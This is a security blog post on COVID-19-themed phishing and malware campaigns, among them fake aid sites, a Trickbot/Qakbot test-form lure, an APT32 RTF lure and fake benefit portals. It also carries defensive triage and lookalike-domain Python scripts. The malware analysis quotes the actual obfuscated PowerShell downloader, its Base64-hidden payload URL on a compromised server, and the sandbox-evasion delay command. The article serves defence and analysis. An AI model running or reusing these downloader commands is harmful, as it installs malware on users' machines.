Coronavirus cyberattacks: the whole point is social engineering

Attackers continue to exploit the COVID-19 theme, creating ever more threats for users who are keenly interested in everything related to the epidemic. In a previous post we described what types of malware appeared in the wake of the coronavirus; today we look at the social engineering techniques that users in different countries, including Russia, have already encountered. General trends and examples are under the cut.


Remember last time we noted that people readily read not only about the coronavirus and the course of the epidemic, but also about financial support measures? Here is a good example. In the German state of North Rhine-Westphalia (NRW), a curious phishing attack was discovered. Attackers created copies of the website of the state Ministry of Economic Affairs (NRW Ministry of Economic Affairs), where anyone can apply for financial assistance. Such a program really exists, and it ended up in the hands of scammers. Having obtained their victims' personal data, they submitted applications on the real Ministry website, but entered different bank details. According to official figures, 4 thousand such fake requests were made before the scheme was uncovered. As a result, $109 million intended for affected citizens ended up in the hands of fraudsters.


Do you want a free test for COVID-19?


Another telling example of coronavirus phishing was found in emails. The messages attracted users' attention with an offer of free testing for coronavirus infection. Attached to these letters were samples of Trickbot / Qakbot / Qbot. When those who wanted to check their health started to “fill out the attached form”, a malicious script was downloaded to the computer. To avoid being caught by sandbox analysis, the script began loading the main malware only after a delay, once the security systems were satisfied that no malicious activity was taking place.

Convincing most users to enable macros was also easy. The standard trick was used: to fill out the questionnaire you first have to enable macros, which means running the VBA script.


In the screenshot, the VBA script is deliberately obfuscated to evade antivirus detection.


The Windows choice command, called with /D Y /T <seconds>, waits the given number of seconds and then accepts the default answer “Y”. Here the script used it to wait 65 seconds before deleting its temporary files, and the malware was downloaded during that wait. For this, a dedicated PowerShell command was launched:

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')"" >C:\Users\Public\1.txt

After decoding the Base64 values, the PowerShell command downloads the backdoor hosted on a previously compromised web server in Germany:

http://automatischer-staubsauger.com/feature/777777.png

and saves it under the name:

C:\Users\Public\tmpdir\file1.exe

The folder ‘C:\Users\Public\tmpdir’ is deleted when the file 'tmps1.bat' is run; that batch file contains the command cmd /c mkdir ""C:\Users\Public\tmpdir"".
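To make the two tricks above (the choice-based sleep used to outwait a sandbox, and the Base64 plus string-concatenation hiding of the download URL and drop path) concrete from the analyst's side, here is an added Python triage helper. It is not code from the original post or from the malware; it assumes a recovered batch script as input, uses the two command lines quoted above as a constructed sample, and reports the decoded URL, the reassembled drop path, the sleep duration and the files the script cleans up.

```python
import base64
import re

# Constructed sample input: the two command lines quoted in the article, one per
# line, as they would appear in a recovered batch file (PowerShell quoting
# normalised to a single pair of double quotes).
SAMPLE_SCRIPT = r"""
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
cmd /C powershell -Command "(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')" >C:\Users\Public\1.txt
"""

# Base64 literals handed to FromBase64String.
B64_LITERAL = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
# Runs of single-quoted fragments glued with '+' (e.g. '1' + '.e' + 'x' + 'e').
CONCAT = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")
# The choice-based sleep: "choice ... /T <seconds>" on one line.
CHOICE_DELAY = re.compile(r"\bchoice\b.*?/T\s+(\d+)", re.IGNORECASE)
# Files removed with del / Del.
DEL_TARGET = re.compile(r"\bdel\b\s+(\S+)", re.IGNORECASE)


def decode_b64_literals(text):
    """Decode every FromBase64String('...') argument as ASCII."""
    return [base64.b64decode(m).decode("ascii") for m in B64_LITERAL.findall(text)]


def join_concats(text):
    """Rebuild strings split into 'a' + 'b' + 'c' to defeat simple signatures."""
    return ["".join(re.findall(r"'([^']*)'", run)) for run in CONCAT.findall(text)]


def choice_delays(text):
    """Seconds the script sleeps via the choice /T trick."""
    return [int(s) for s in CHOICE_DELAY.findall(text)]


def deleted_files(text):
    """Paths the script removes during its clean-up."""
    return DEL_TARGET.findall(text)


def triage(script):
    decoded = decode_b64_literals(script)
    report = {
        "delay_seconds": choice_delays(script),
        "urls": [d for d in decoded if d.lower().startswith(("http://", "https://"))],
        "paths": [d for d in decoded if re.match(r"^[A-Za-z]:\\", d)],
        "concatenated": join_concats(script),
        "deleted": deleted_files(script),
        "downloader": "DownloadFile" in script or "DownloadString" in script,
    }
    # The dropped file name is the decoded path prefix plus the concatenated suffix.
    report["dropped"] = [p + c for p in report["paths"] for c in report["concatenated"]]
    # Heuristic verdict: a sleep of half a minute or more combined with a
    # Base64-hidden download URL is the sandbox-evasion pattern described above.
    report["suspicious"] = (
        report["downloader"]
        and bool(report["urls"])
        and any(d >= 30 for d in report["delay_seconds"])
    )
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

The regular expressions are deliberately narrow: they recover the indicators for this specific obfuscation style (Base64 in FromBase64String and '+'-joined literals), so a sample that uses a different encoder or builds strings with -join or format operators will need additional patterns rather than a looser regex.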

Targeted attack on government agencies


In addition, FireEye analysts recently reported a targeted attack by APT32 aimed at Wuhan government structures and at the Chinese Ministry of Emergency Management. One of the distributed RTF files contained a link to a New York Times article entitled “Coronavirus Live Updates: China is Tracking Travelers From Hubei”. Opening it, however, also triggered a malware download (FireEye analysts identified the sample as METALJACK).

Interestingly, at the time of detection none of the antivirus engines on VirusTotal flagged this sample.


When official sites “lie”


The most striking example of a phishing attack happened in Russia just the other day. The trigger was the introduction of the long-awaited allowance for children aged 3 to 16. When the start of application intake was announced on May 12, 2020, millions rushed to the State Services (Gosuslugi) website for the long-awaited help and brought the portal down no worse than a professional DDoS attack would. When the president said that “State Services could not cope with the flow of applications”, word began to spread that an alternative site for accepting applications had started operating.


The problem is that several such sites went live at once, and while one, the real one at posobie16.gosuslugi.ru, really does accept applications, dozens more collect the personal data of trusting users.

Colleagues from HeartInform found about 30 new fraudulent domains in the .ru zone. Infosecurity a Softline Company has tracked over 70 similar fake State Services sites since early April. Their creators manipulate familiar symbols and use combinations of the words gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie and so on.
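Added example, not code from the original post or from the companies it cites: a small Python classifier for the domain pattern just described. It flags hostnames that combine the lure words above, or carry a one- or two-character typo of the brand label, while their registrable domain is not the genuine gosuslugi.ru. The sample hostnames are constructed for the demo and are not the fraudulent domains the researchers found.

```python
import re

# The genuine registrable domain of the State Services portal
# (posobie16.gosuslugi.ru is a host under it).
ALLOWLIST = {"gosuslugi.ru"}
BRAND = "gosuslugi"
# Lure words the fraudulent domains combine, as listed in the article.
LURE_WORDS = ("gosuslugi", "vyplaty", "posobie", "covid")

# Constructed sample input for this demo; none of these are domains
# reported by the researchers.
SAMPLE_HOSTS = [
    "posobie16.gosuslugi.ru",           # genuine
    "gosuslugi-16.ru",                  # lure word, wrong registrable domain
    "covid-vyplaty.ru",                 # lure words only
    "gosuslugi.ru.posobie-example.ru",  # brand as a subdomain of an unrelated domain
    "gosusIugi.ru",                     # capital I in place of l
    "example.ru",                       # unrelated
]


def registrable_domain(host):
    """Last two labels; adequate for .ru, see the note below for other TLDs."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def levenshtein(a, b):
    """Edit distance, used to catch one- or two-character typosquats of the brand."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host):
    host = host.lower()
    if registrable_domain(host) in ALLOWLIST:
        return "legitimate"
    # Split on dots, hyphens and digit runs so "gosuslugi-16" and "posobie16"
    # expose the words they are built from.
    labels = [part for part in re.split(r"[.\-]|\d+", host) if part]
    if any(word in host for word in LURE_WORDS):
        return "lookalike"
    if any(levenshtein(label, BRAND) <= 2 for label in labels):
        return "lookalike"
    return "unrelated"


def scan(hosts):
    """Map each hostname to its verdict."""
    return {h: classify(h) for h in hosts}


if __name__ == "__main__":
    for host, verdict in scan(SAMPLE_HOSTS).items():
        print(f"{verdict:10} {host}")
```

Two caveats for real use. registrable_domain takes the last two labels, which is fine for the .ru zone but wrong for multi-part suffixes such as co.uk; production code should consult the public suffix list. And substring matching on lure words will also flag legitimate third-party pages that mention the allowance, so a verdict of "lookalike" is a reason to look at registration date and certificate history, not a final judgement.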

Hype and Social Engineering


All these examples only confirm that attackers are successfully monetising the coronavirus theme. The higher the social tension and the more unanswered questions there are, the greater the fraudsters' chances of stealing important data, getting people to hand over their money themselves, or simply compromising more computers.

And given that the pandemic forced large numbers of potentially unprepared people to work from home, not only personal but also corporate data is at risk. For example, users of Microsoft 365 (formerly Office 365) were recently subjected to a phishing attack. People received, en masse, “missed” voice messages as email attachments. In fact, however, the files were an HTML page that sent the victims to a fake Microsoft 365 login page. The result: loss of access and compromise of all data in the account.
